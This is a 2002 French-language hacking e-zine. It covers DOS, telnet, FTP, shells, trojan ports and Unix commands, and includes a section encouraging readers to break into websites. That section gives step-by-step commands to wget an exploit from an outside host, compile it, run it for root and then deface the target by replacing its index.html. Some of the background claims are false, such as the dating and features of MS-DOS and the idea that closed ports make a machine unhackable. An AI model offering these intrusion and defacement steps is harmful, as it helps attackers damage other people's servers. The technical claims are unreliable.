ARK NETWORK reference.ch · populus.ch    
 
  
hacking 
 
 
Rubriques

Liens

 Home  | Livre d'Or  | Album-Photo  | Contact

ezine

############################ ####################################### 
#################### 1RST YaZ MaG ################################# 
############## W.o.L.f H.a.C.k ############################ 
########## 08/06/02 N° 1 ######################## 
########################################################################### 
-->DEDICACE & PREFACE 
salam 3alikoom a tous les marocains qui ont decidé de vivre en underground  
et suivre le chemin des dures qui ont fondé cette force absolue qui a pour 
but d'informer plus que detruire..je vais pas rentrer dans les details je 
profite du temps pour me presenter :) bein! mon nom c'est YaZ (le nom c pas 
a la mode et pour des raisons de secu :), 20 ans programmeur&analyste 
(c,vb,assembleur en cours )j'ai commencé le metier depuis 4 ans dans les  
vieux cyber de la medina-X-et daba ca fait 2 ans que je pratique le hacking 
et que la scene underground marocaine commence avec des jeunes talents 
qui vont boulverser la logique :) 
--je dedie cet E-zine a tous le staff #xxroot pife,sysiph,the_matrix,HiM, 
mehdilson,X-hacker et les autres (sorry si j'ai oublié un nick :=) 
 
-->lma9adirr :) 
 
1)introduction au hacking 
2)les principes de base  
3)Ms-DoS 
4)explication : 
 
----telnet 
-Qu' est-ce que Telnet ? 
-les dangers de telnet! 
-Comment lancer une communication par Telnet ? 
--- ftp 
-- shell 
- port 
5)hacker un site a l'aide d'un shell 
 
6)les commandes unix pour vous debrouiller :) 
 
7)astuces WiNtOwZz  
 
8)misk al khitam (conclusion :) 
 
indar sfrr: 
_________ 
 
# je ne suis absolument pas le responsable de se que vous allez faire avec 
ces trezors j'ai deposé ces infos pour le seul but (informatif) ni moi ou 
le webmaster sont responsables  
 
//////////////////////// INTRODUCTION AU HACKING ///////////////////////// 
\\\\\\\\\\\\\\\\\\\\\\\\ ----------------------- \\\\\\\\\\\\\\\\\\\\\\\\\  
 
 
qui d'entre vous n'as jamais entendu parler du piratage informatique (hacking) 
?en effet,le hacking c'est l'art de la strategie et du bon usage de la logique 
informatique c'est un domaine tres vaste en ses multiples branches  
d'ou on extracte le mot 'hacker' ce mot que tous les newbies veulent porter 
ainsi, le hacking c'est l'acces et le maintien frauduleux total ou partiel 
dans tous ou partie d'un systéme cette definition appartient a l'etat 
question de faire peur aux chevaliers des etoiles :) . 
 
/////////////////////// LES PRINCIPES DE BASE ///////////////////////////// 
\\\\\\\\\\\\\\\\\\\\\\\ --------------------- \\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 
 
chaque hacker commence avec une idée fixe dans la tete et une attitude 
differente 
en ce qui concerne le hack mais au cours du temps et de l'experience il  
commence a croire au principe de base du hacking et bien sur c'est defendre  
la liberté d'expression et permettre au grand public de partager les petits 
secrets de l'etat et etre au courant de se qui se passe loin de leurs yeux  
outre, un hacker doit posseder une certaine logique informatique avec laquelle 
il peut resoudre les problemes qu'il rencontre (pour s'infiltrer par ex) 
plus la large imagination illimité pour combler la tâche car quand un vrai 
hacker veux frappe a la porte son imagination est son seul obstacle ni les 
firewalls (pare-feu) ni les antis peuvent le stopper.une derniere chose et 
c'est 
la plus importante c'est la veille informatique car comme vous le savez la  
technologis avance a quatre pattes et l'informatique aussi et c'est normal 
que les failles d'hier n'existent pas aujourd'hui et les sites security 
explosent 
de plus en plus les vulnerabilites et les patch convenables mis a jour. 
 
/////////////////////// Ms-DoS ////////////////////////////// 
\\\\\\\\\\\\\\\\\\\\\\\ ------ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 
 
j'ai choisi de commencer l'ezine par une petite explication sur le systeme 
d'exploitation le plus aimé dans le monde avec son interface a couper le 
souffle 
:) et ses multiples commandes car j'ai pensé que c'est un os (operating system) 
pour bien s'initier.comme vous le savez Ms-DoS est un systeme d'exploitation 
réalisé par la societe naziste mikrozoft (j'adore la nommer comme ca ;) 
pour le micro-ordinateur IBM PC en 1978-1979. 
la conception du systeme d'exploitation Ms-DoS et son fonctionnement en font  
de lui l'un des systemes d'exploitation actuels les plus orientés vers l'avenir 
sa portabilité excelente et son adaptabilité ont fait de dos le plus repandu 
en micro-infomatique.Ms-DoS a connu un developpement rapide,il permet a partir 
de la version 4 de prendre en consideration la gestin multitache (voir la 
nouvelle gamme de micro-ordinateur 32 bits) 
sans doute un de vous connait une des commandes connues de dos mais sachez 
qu'il y'a d'autres que vous avez rarement entendu je cite des exemples 
ci-dessous 
 
DBLSPACE : augmenter la capacité de memoire d'un disque dur ou d'une disquette 
c'est une interface pour compresser les disques selon deux methodes rapide 
et personnalisée 
 
VERIFY [on|off]: activer ou désactiver le vérification de l'ecriture sur 
le disque 
 
POWER : active ou désactive le gestionnaire de courant tapez power /? pour  
plus d'infos 
 
MSD : produire une analyse détaillée des données techniques de votre systéme 
 
//////////////////////// EXPLICATIONS UTILES ////////////////////////// 
\\\\\\\\\\\\\\\\\\\\\\\\ ___________________ \\\\\\\\\\\\\\\\\\\\\\\\\\ 
 
j'ai choisi de vous faire expliquer des trucs qui sont tres indispensables 
au matiere de l'informatique et font partie du computer vocabulary 
alors je vous laisse admirer ces oeuvres :) 
 
 
TELNET : 
======== 
 
----> Qu' est-ce que Telnet ? 
Telnet est un protocole permettant par l' intermédiaire d' une console de 
communiquer avec une machine Unix et de lui faire éxecuter des commandes  
en utilisant un minimum de ressources. Il est fréquement utilisé pour 
relever sa boîte au lettre etc... mais représente également une opportunité 
pour le pirate. 
 
----> Quels sont les dangers de Telnet ? 
Les dangers de Telnet varient selon les failles du serveur avec lequel on 
communique. Cela peut aller de l' envoie de mail anonyme à l' utilisation 
d' un cheval de troie situé sur le serveur. 
 
----> Comment lancer une commucation par Telnet ? 
Faites la procédure suivante : "Démarrez>Executer>Telnet". 
La console se lance normalement, après quoi, il vous faudra saisir  
l' adresse de l' hôte distant que vous souhaitez contacter. 
 
exemple : 
========= 
meme sous mirc c'est possible de se connecter :) 
/run telnet wa3.yaz.com 23 
login : yaz 
password : ******************************* et c pa encore fini :) 
 
FTP : 
===== 
 
le célebre FTP (file tranfert protocol) ce service qui joue le role d'une 
charrette entre le client et le serveur (relation qui merite d'etre expliké  
dans un autre e-zine) ftp transfert les fichiers vers votre hebergeur 
de sites.il permet aussi la gestion de fichiers sur le serveur (input/output) ou 
gerer les comptes des utilisateurs voici quelques exemples: 
 
---sur le navigateur web :  
 
ftp://yaz@ftp.linuxdoom.com 
si l'utilisateur a un compte dans le serveur il peut se connecter avec son  
login et password sinon il peut se connecter (annonymous) ca veut dire avec 
login : annonymous 
password : yaz@email.dialk 
 
---sur MS-dos : 
tape ftp ===> open www.server.com 
username : annonymous 
password : yaz@email.dialk 
 
SHELL: 
===== 
le shell est un interpréteur de commandes interactif c'est le programme 
qui traduit et envoie vos commandes au noyau de votre système. 
Ceci se produit parce que le noyau ne comprend pas les commandes 
que vous lui donnez. Par exemple, quand vous tapez le " Cd ",  
cette commande sera d'abord traduite à un niveau bas de langage 
par l'interpréteur de commandes interactif et juste aprés cela, 
envoyé au noyau (ou à votre unité centrale de traitement). 
Imaginez-vous comment douloureux d'utiliser un 
ordinateur si vous n'aviez pas un interpréteur de commandes  
interactif? Vous avez dû utiliser un niveau bas de langage, 
comme l'assembleur ou même le plus mauvais (binaire)  
Si vous vouliez faire le"Cd". " vous devriez  
écrire un groupe de nombres binaires (0 ou 1 ) 
ou un énorme énumère de 00101010. Pensez-vous vraiment que ceci 
fonctionnerait avec des personnes? je pense avec des alienz ca va péter 
 
PORT : 
====== 
Les ports sur une machine sont des entrées sur votre pc qui vous permettent 
d'échanger des informations dans un sens ou dans un autre avec une autre  
machine. Sur Internet vous pouvez échanger énormément de données par 
plusieurs ports différents à plusieurs machines. Chaque port a ses 
caractéristiques, l'un permet de lire le courrier, l'autre permet de  
communiquer par icq, un autre permet de télécharger des fichiers... 
Il existes plusieurs centaines de ports différents sur une machine. Bref, 
vous l'aurez compris, les ports sont indispensable à l'échange 
d'informations par internet, cependant, comme ils constituent les seules  
entrées existantes vers votre pc, c'est par la que les hackers pénètrent  
dans votre machine et réciproquement, c'est par ces ports que vous vous 
infiltrerez dans un serveur ou n'importe quel ordinateur.  
 
Certain vous dirons sûrement quelque chose, comme le port 21 qui est celui 
du ftp , le port 23 est aussi assez connu puisque c'est celui du telnet et  
aussi l'entrée favorite de la majorité des troyens (d'où le nom Socket23), 
le port 25 appelé SMTP permet d'envoyer du courrier et le port 110 (POP),  
permet de relever celui ci.  
 
 
Bref je vois pas trop quoi dire d'autre sur les ports sinon que si les 
votres sont tous fermés, vous n'avez aucune chance, mais alors aucune, 
de vous faire hacker. Ceci est valable bien sur si votre disque est saint, 
c'est sur que si vous êtes infecté par au minimum un troyen ou si vous avez 
une bombe logique camouflée quelque part dans votre ordinateur, 
vous risquez d'avoir certains problèmes vu qu'un programme comme un troyen 
a comme but premier d'ouvrir un port pour que le hacker puisse entrer 
et faire ce qu'il veut. 
 
 
******************NukeNabber et Port Watchers :***************************** 
 
NukeNabber est un port watcher, c'est à dire que c'est un programme qui 
a pour fonction de fermer vos ports d'écouter ce qui passe dessus. 
Ca permet de savoir à tout moment si quelqu'un essaye de rentrer sur votre 
machine, de vous nuker, de scanner vos ports, de vous flooder, 
d'ouvrir une session ftp...de plus ça vous donne l'ip du mec qui veut 
rentrer :-). Ce programme est donc indispensable pour votre sécurité.  
 
 
Numéro des ports à watcher 
Protocole 
Type d'attaque possible par ce port 
 

icmp 
Bonne question du genre troyen mais sans taupe alors fermez ce port, 
c'est l'un des + dangereux !!! 
 
19 
udp 
 
 
21 
tcp 
Troyen (eh ouais c'est ftp les mecs !!!) 
 
23 
tcp 
Troyen (et ça c'est telnet, NO COMMENT...!!!) 
 
53 
tcp 
 
 
59 
tcp 
Nuker, Flooder 
 
129 
tcp 
 
 
137 
tcp 
 
 
138 
tcp 
 
 
139 
tcp 
Nuker, Flooder 
 
666 
tcp 
 
 
1027 
tcp 
 
 
1029 
tcp 
 
 
1032 
tcp 
 
 
5000 
tcp 
Troyen (par défaut celui du Sockets de troie) 
 
5001 
tcp 
Troyen (Sockets de troie aussi) 
 
12345 
tcp 
Troyen (par défaut celui de Netbus) 
 
12346 
tcp 
Troyen (Netbus aussi) 
 
30303 
tcp 
Troyen (je me souviens plus lequel) 
 
31337 
tcp 
Troyen (par défaut celui de Back Orifice) 
 
/////////////////////////// hacker un site a ////////////////////////////// 
\\\\\\\\\\\\\\\\\\\\\\\\\\\l'aide d'un shell\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 
 
il n'ya pas une seule methode pour hacker un site mais ilk 'yas des tonnes 
ca depent des failles et des configurations (os aussi)mais comme c'est un 
premier essai je vais vous donner une petite astuces (teknik plutot) pour 
hacker un site : 
tout d'abord tu dois avoir un shell (c'est expliké en haut :) 
a condition que tu sois familier avec les commandes unix/linux t'inquiete 
pas je te file une liste des commandz juste en bas.apres tu dois faire 
une petite recherche sur the best of the best google.com ===> exploits 
surement ca vas etre 111111 matches found :) tu note bien la page de 
telechargement  
sur le site exemple www.haklolita.com/exploits/xload.c tu reviens a ton  
shell obeissant et tu tape : 
 
wget www.haklolita.com/exploits/xload.c * 
* = cela vas telecharger l'exploit sur ton account (shell) 
apres tu dois comiler l'exploit pour qu'il soit executable tu tapera ceci: 
gcc -o xload xload.c * 
* = cela vas comiler l'exploit et le mettre au dossier (xload) 
nb : je vais traiter les exploits dans un autre e-mag be patient :) 
apres ca tu le mets en marche pour le faire c simple 
./xload 
hola!! tu es root  
#whoami 
root waw  
maintenant tu pex faire ce que tu veux sur le serveur modifier,supprimer, 
ajouter,renommer foutre le bordel (dar dark asidi :) 
apres avoir le root sur le serveur voulou (tu devras le scanner d'abord) 
tu cherchera le fichier index.html et tu le modifie c'est simple 
wget www.yaz.com/mymirror.htm 
rm index.html 
ren mymirror.htm index.htm 
et le tour est jouée et n'oublie ceci est reinque un titi exemple au cours 
du temps tu vas creer tes propres methodes de defacement ;) un pro koi 
 
\\\\\\\\\\\\\\\\\\\\\\\\\____Commandes UNIX_____//////////////////////////// 
/////////////////////////=======================\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 
 
 
Commandes de base : (avec équivalence DOS) 
ls affiche les fichiers du répertoire (= DIR /W) 
Switch -l : (liste) affiche tout ça en liste avec détails (= DIR) 
Switch -a : (all) affiche aussi les fichiers cachés (on peut combiner -la ou 
-al) 
mkdir rep crée le répertoire rep (=mkdir DOS) 
cd rep va dans le répertoire rep (comme DOS) 
(répertoires spéciaux : . répertoire courant .. répertoire précédent) 
(arborescence avec des / et non des \ comme DOS) 
pwd donne le répertoire courant 
emacs editeur interne de texte comme (=EDIT) 
cat test.txt affiche test.txt (=TYPE) 
more test.txt par page (=TYPE | more) 
less test.txt on peut aussi revenir en arriere 
mv source.txt dest.txt déplace le fichier (=MOVE) 
cp source.txt dest.txt copie le fichier (=COPY) 
./test lance test (= test) 
export TERM=vt100 modifier une variable d’environnement (ici, fixe TERM à 
vt100) 
locate test cherche le fichier test dans l’arborescence (=DIR /S) 
 
Compiler un programme en C : 
gcc -Wall -o test test.c 
 
Processus (= programmes résidents) 
Un programme est en cours : appuyez sur CTRL C pour le terminer, CTRL Z pour le 
mettre en pause (retour à l’interpreteur, mais le prog reste résident). 
Réappeler le prog (./test) pour reprendre après CTRL Z. 
ps liste des programmes résidents avec n° de processus (identificateur) 
(le programme spécial bash est l’interpreteur, ne le fermez pas…) 
Switch -f détails des niveaux de sécurité 
Switch -a on voit les programmes résidents cachés (login) 
Switch -l liste, gros détails (on peut combiner -la …) 
Switch -x je n’ai po encore vu la différence avec le switch -f 
bg ./test passe en tache de fond, le prog tourne, mais laisse la main à 
l’interpreteur. 
fg ./test passe le programme normalement (pour restorer apres bg) 
./test & lance test et le met direct en tache de fond. 
kill -KILL 14857 détruit le processus ayant comme n°14857 (numéro exemple) 
top gestionnaire de processus (voit ceux de tout le réseau aussi) 
 
Réseau : 
nslookup nommachine retourne le n°IP de la machine dont on entre le nom 
ping adrsIP retourne le ping en fonction de l’adresse IP (voir nslookup pour 
avoir l’IP) 
traceroute www.fvirtman.fr.st liste des routeurs empruntés pour aller sur mon 
site 
netstat affiche la connection de tous les ordis du réseau 
telnet pour se connecter sur une machine distante. 
lynx www.fvirtman.fr.st explorateur mode texte. 
 
////////////////////// astuces WiNToWZ //////////////////////////////////// 
\\\\\\\\\\\\\\\\\\\\\\ =============== \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 
 
*** Changement de résolution et redémarrage 
 
Lorsque vous effectuez une modification du nombre de couleurs de votre écran 
à l'aide de Demarrer - Paramètres - Panneau de configuration - Affichage - 
Onglet paramètres. Windows vous demande si vous voulez redémarrer Windows. 
Cochez "Appliquer les modification sans redémarrer" car ce n'est pas 
nécessaire. 
 
 
*** Masquer le curseur de la souris 
 
Le curseur vous gène lorsque vous tapez au clavier ? il existe une 
possibilité de masque le curseur dès que vous tapez sur le clavier. Le 
curseur de la souris reviendra dès que vous bougerez la souris. Pour ce 
faire : Demarrer - Paramètres - Panneau de configuration - Souris - Onglet 
Options du Pointeur - Cochez Masquez le pointeur en cours de frappe. 
 
 
*** De petites icônes dans le Démarrer 
 
Lors de la première installation de Windows, les icônes du Menu démarrer 
sont en grand format ! Voici comment les réduire : Clic droit sur un espace 
vide de la barre des tâches - Propriétés - Cochez "Afficher les Petites  
icônes dans le Menu démarrer". 
 
 
*** Indispensable ! 
 
Vous voulez modifier les chemins des dossiers systèmes (bureau, menu  
démarrer ...), enlever la corbeille, Voisinage réseau, poste de travail ...  
du bureau, enlever des icônes de votre panneau de configuration (pour éviter 
toute mauvaise manipulation) ... Toutes ces commandes sont disponibles avec 
ce logiciel gratuit qu'est Tweak UI. 
 
*** Supprimer les entrées de Executer 
 
Pour supprimer les entrées du menu Exécuter du Démarrer, il vous suffit de 
vider l'historique sous Internet Explorer.  
Menu Outils - Options Internet - Bouton "Effacer l'historique".  
 
Ensuite fermez toutes les fenêtres Internet Explorer et Explorateur, 
Demarrer - Arreter - cliquez sur annuler. Toutes les entrées du Exécuter  
sont parties ! 
Fonctionnalités cachées de Exécuter 
 
 
 
*** Vocabulaire 
 
Effectuez un clic droit sur un dossier de votre bureau par exemple, vous  
avez 2 commandes possibles : Ouvrir et Explorer. Quelle est la différence 
entre ces 2 commandes ? Explorer vous ouvre l'explorateur de fichiers  
(avec l'arborescence des répertoires sur la gauche), Ouvrir ne vous affiche 
que le contenu du dossier (sans l'arborescence) 
 
 
*** Quand vous insérez un CD ROM 
 
Si vous voulez éviter le lancement automatique de CD Audio ou de données 
lors de l'insertion, effectuez un clic droit sur Poste de travail - puis  
propriétés - onglet gestionnaire de périphériques - localisez votre Lecteur 
CD ROM dans la liste des matériels. Double cliquez dessus - onglet 
Paramètres - décochez notification d'insertion automatique.  
 
 
/////////////////////////////misk al khitam (conclusion :)//////////////// 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\=============================\\\\\\\\\\\\\\\\ 
 
finalement, je souhaite que vous appreciez ce e-mag et je remercie encore une  
fois X-hacker qui m'as bien aidé ainsi je remercie tous les newbies marocains 
qui bavent pour le savoir et la connaissance et inchallah avec un peu de  
courage tous vas vers le bien rdv au 2 e-mag prochainement  
pour le contact : yaz4ever@caramail.com (pas de bomb mails plz :) 
www.yaz.unixlover.com ===> under construction but not 4 long time :) 
 
 
 
 

(c) flyhacking - Créé à l'aide de Populus.
Modifié en dernier lieu le 17.05.2004
- Déjà 5064 visites sur ce site!